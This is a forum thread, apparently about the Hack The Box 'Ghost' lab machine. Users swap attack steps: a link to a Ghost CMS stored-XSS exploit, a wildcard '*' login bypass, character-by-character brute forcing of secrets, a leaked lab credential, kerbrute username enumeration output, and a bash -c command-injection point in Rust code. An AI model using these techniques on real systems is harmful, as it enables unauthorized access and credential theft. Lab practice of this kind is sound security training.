[jahman]

There is this blogpost that could be useful: Ghost CMS Stored XSS Leading to Owner Takeover

https://rhinosecuritylabs.com/research/c...tored-xss/
and the exploit:
https://github.com/RhinoSecurityLabs/CVE...2024-23724

Not clear to me if it's patched or not:
...
"The vendor does not view this as a valid vector so will not be releasing an official patch, but it’s important to us at Rhino to not release unpatched vulnerabilities. While this is a unique case, we’ve decided to make the patch ourselves which is available at TryGhost/Ghost#19646."
...

[osamy7593]

http://ghost.htb:8008/ghost/api/content/...38c83aaca6

maybe we could get an IDOR

How did you get the key?

inspect the network taffic and click the search Icon. You should see a request to the api.

bro i can;t find it plz can u explain

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[chewablechunk01]

http://ghost.htb:8008/ghost/api/content/...38c83aaca6

maybe we could get an IDOR

How did you get the key?

inspect the network taffic and click the search Icon. You should see a request to the api.

bro i can;t find it plz can u explain

in the main page click on the searchbar and then open the inspector, go to the network section and once you click on the searchbar it will show you the key

[osamy7593]

thx man


http://intranet.ghost.htb:8008/

user is * and secret is *

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[chewablechunk01]

thx man


http://intranet.ghost.htb:8008/

user is * and secret is *

anytime bro!! and how did you find user and secret ?

[xzin0vich]

http://intranet.ghost.htb:8008

User: kathryn.holland
Secret: *

Yes, just *

It works for all users. Maybe it's treated like a wildcard and we can bruteforce a*, b*, etc.


There's also http://gitea.ghost.htb:8008/

A good point, great jobs

[ritualist]

http://gitea.ghost.htb:8008/
User: gitea_temp_principal
Password: szrr8kpc3z6onlqf

The initial * password I found by just brute forcing with rockyou. Eventually ***** threw an error and from there I figured it out.

All the secrets can be brute forced as I expected above. Just try sz*, szr*, etc. in a script until you find it.

[osamy7593]

http://gitea.ghost.htb:8008/
User: gitea_temp_principal
Password: szrr8kpc3z6onlqf

The initial * password I found by just brute forcing with rockyou. Eventually ***** threw an error and from there I figured it out.

All the secrets can be brute forced as I expected above. Just try sz*, szr*, etc. in a script until you find it.

can u send the script

---

/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 07/14/24 - Ronnie Flathers @ropnop

2024/07/14 01:43:31 > Using KDC(s):
2024/07/14 01:43:31 > DC01.ghost.htb:88

2024/07/14 01:43:31 > [+] VALID USERNAME: charles.gray@ghost.htb
2024/07/14 01:43:31 > [+] VALID USERNAME: justin.bradley@ghost.htb
2024/07/14 01:43:31 > [+] VALID USERNAME: robert.steeves@ghost.htb
2024/07/14 01:43:31 > [+] VALID USERNAME: beth.clark@ghost.htb
2024/07/14 01:43:31 > [+] VALID USERNAME: kathryn.holland@ghost.htb
2024/07/14 01:43:31 > [+] VALID USERNAME: Administrator@ghost.htb
2024/07/14 01:43:31 > [+] VALID USERNAME: arthur.boyd@ghost.htb
2024/07/14 01:43:31 > [+] VALID USERNAME: cassandra.shelton@ghost.htb
2024/07/14 01:43:31 > [+] VALID USERNAME: florence.ramirez@ghost.htb
2024/07/14 01:43:31 > [+] VALID USERNAME: jason.taylor@ghost.htb
2024/07/14 01:43:32 > [+] VALID USERNAME: intranet_principal@ghost.htb
2024/07/14 01:43:32 > [+] VALID USERNAME: gitea_temp_principal@ghost.htb

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[osamy7593]

any one get anything

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[osamy7593]

There are 3 strings that look like an API Key, but none of them worked in the API of ghost

Also, the public API in Ghost needs an API key. We can write it here since it only allows access to public data: a5af628828958c976a3b6cc81a

RUN echo 659cdeec9cd6330001baefbf > /var/lib/ghost/extra/important

In an old commit, there is another token: 790b10c60e71093a33449804e2

I'm using this script https://ghost.org/docs/admin-api/#token-generation

Maybe the next inject point is the bash command from the dev-api? We need to set the header X-DEV-INTRANET-KEY to match DEV_INTRANET_KEY and basically we can execute any bash command

  let result = Command::new("bash")
        .arg("-c")
        .arg(format!("intranet_url_check {}", data.url))
        .output();

it tells the apikey wrong

---

There are 3 strings that look like an API Key, but none of them worked in the API of ghost

Also, the public API in Ghost needs an API key. We can write it here since it only allows access to public data: a5af628828958c976a3b6cc81a

RUN echo 659cdeec9cd6330001baefbf > /var/lib/ghost/extra/important

In an old commit, there is another token: 790b10c60e71093a33449804e2

I'm using this script https://ghost.org/docs/admin-api/#token-generation

Maybe the next inject point is the bash command from the dev-api? We need to set the header X-DEV-INTRANET-KEY to match DEV_INTRANET_KEY and basically we can execute any bash command

  let result = Command::new("bash")
        .arg("-c")
        .arg(format!("intranet_url_check {}", data.url))
        .output();

bro i found scan.rs ... how can we access it

---

http://intranet.ghost.htb/api-dev/ what is the endpoint

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed